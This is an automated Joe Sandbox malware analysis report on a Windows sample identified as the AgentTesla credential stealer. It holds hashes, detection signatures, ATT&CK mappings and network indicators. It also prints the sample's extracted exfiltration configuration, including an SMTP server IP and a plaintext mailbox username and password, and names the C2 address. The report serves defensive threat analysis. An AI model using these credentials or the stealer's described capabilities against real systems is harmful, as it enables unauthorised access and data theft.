Windows
Analysis Report
D6yz87XjgM.exe
Overview
General Information
Sample name: | D6yz87XjgM.exerenamed because original name is a hash value |
Original sample name: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe |
Analysis ID: | 1549405 |
MD5: | eb180d9ac3c0ee0feb1b997ef3908f36 |
SHA1: | 17dcf2886e1dce74561ac12b4374b7d441f399b8 |
SHA256: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be |
Tags: | exeuser-adrian__luca |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- D6yz87XjgM.exe (PID: 7748 cmdline:
"C:\Users\ user\Deskt op\D6yz87X jgM.exe" MD5: EB180D9AC3C0EE0FEB1B997EF3908F36) - RegAsm.exe (PID: 7896 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\reg asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 7908 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\reg asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 19 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Click to see the 19 entries |
Networking |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:05:16.773977+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 49741 | TCP |
2024-11-05T16:06:01.795556+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 55627 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:06:46.896832+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.7 | 49706 | 162.254.34.31 | 587 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | .Net Code: | ||
Source: | .Net Code: | ||
Source: | .Net Code: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 4_2_0054A57F | |
Source: | Code function: | 4_2_02272B06 | |
Source: | Code function: | 4_2_02272AF7 | |
Source: | Code function: | 4_2_02272B02 | |
Source: | Code function: | 8_2_00444061 | |
Source: | Code function: | 8_2_00444095 | |
Source: | Code function: | 8_2_00441149 | |
Source: | Code function: | 8_2_004442FC | |
Source: | Code function: | 8_2_00443A8E | |
Source: | Code function: | 8_2_00441710 | |
Source: | Code function: | 8_2_004413F9 | |
Source: | Code function: | 8_2_004444A7 | |
Source: | Code function: | 8_2_00441A74 | |
Source: | Code function: | 8_2_00441A33 | |
Source: | Code function: | 8_2_00441ADC | |
Source: | Code function: | 8_2_0044172A | |
Source: | Code function: | 8_2_004443EB |
Source: | Code function: | 8_2_02EA4AA0 | |
Source: | Code function: | 8_2_02EAAA32 | |
Source: | Code function: | 8_2_02EADBE0 | |
Source: | Code function: | 8_2_02EA3E88 | |
Source: | Code function: | 8_2_02EA41D0 | |
Source: | Code function: | 8_2_068C45C0 | |
Source: | Code function: | 8_2_068C5D50 | |
Source: | Code function: | 8_2_068C3560 | |
Source: | Code function: | 8_2_068CE0D9 | |
Source: | Code function: | 8_2_068C1018 | |
Source: | Code function: | 8_2_068C91F8 | |
Source: | Code function: | 8_2_068CA150 | |
Source: | Code function: | 8_2_068C5670 | |
Source: | Code function: | 8_2_068C3CAB | |
Source: | Code function: | 8_2_068C02F8 | |
Source: | Code function: | 8_2_068CC370 | |
Source: | Code function: | 8_2_06A1A198 | |
Source: | Code function: | 8_2_02EADF88 |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: | ||
Source: | Cryptographic APIs: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Code function: | 4_2_00408115 | |
Source: | Code function: | 4_2_02270330 | |
Source: | Code function: | 4_2_0227141A | |
Source: | Code function: | 4_2_022758A7 | |
Source: | Code function: | 8_2_00442788 | |
Source: | Code function: | 8_2_00442F02 | |
Source: | Code function: | 8_2_02EA0C7A | |
Source: | Code function: | 8_2_02EA0C52 | |
Source: | Code function: | 8_2_06A1FAF4 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 4_2_0054A84C | |
Source: | Code function: | 4_2_0054A860 | |
Source: | Code function: | 4_2_0054AB35 | |
Source: | Code function: | 4_2_0054A7DA | |
Source: | Code function: | 4_2_02272B06 | |
Source: | Code function: | 4_2_02276A17 | |
Source: | Code function: | 4_2_02276F4D | |
Source: | Code function: | 4_2_02276C57 | |
Source: | Code function: | 4_2_022730D7 | |
Source: | Code function: | 4_2_022768DC | |
Source: | Code function: | 4_2_0227690D | |
Source: | Code function: | 4_2_02276965 | |
Source: | Code function: | 8_2_00443846 | |
Source: | Code function: | 8_2_004438F8 | |
Source: | Code function: | 8_2_0044388F | |
Source: | Code function: | 8_2_0044448A | |
Source: | Code function: | 8_2_004438AB | |
Source: | Code function: | 8_2_00443D84 | |
Source: | Code function: | 8_2_00443E2E | |
Source: | Code function: | 8_2_00443AE6 | |
Source: | Code function: | 8_2_00443B38 | |
Source: | Code function: | 8_2_004437EE | |
Source: | Code function: | 8_2_004437BD |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior |
Source: | Section unmapped: | Jump to behavior | ||
Source: | Section unmapped: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
37% | ReversingLabs | Win32.Trojan.Midie | ||
100% | Avira | TR/AD.GenSteal.zobjr |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 172.67.74.152 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true | |
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1549405 |
Start date and time: | 2024-11-05 16:03:59 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 13 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | D6yz87XjgM.exerenamed because original name is a hash value |
Original Sample Name: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe |
Detection: | MAL |
Classification: | mal100.spre.troj.spyw.evad.winEXE@5/1@1/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: D6yz87XjgM.exe
Time | Type | Description |
---|---|---|
10:05:05 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
162.254.34.31 | Get hash | malicious | AgentTesla | Browse | ||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
172.67.74.152 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RDPWrap Tool | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader, Stealc, Vidar | Browse |
| ||
Get hash | malicious | RDPWrap Tool | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
api.ipify.org | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Targeted Ransomware | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
VIVIDHOSTINGUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
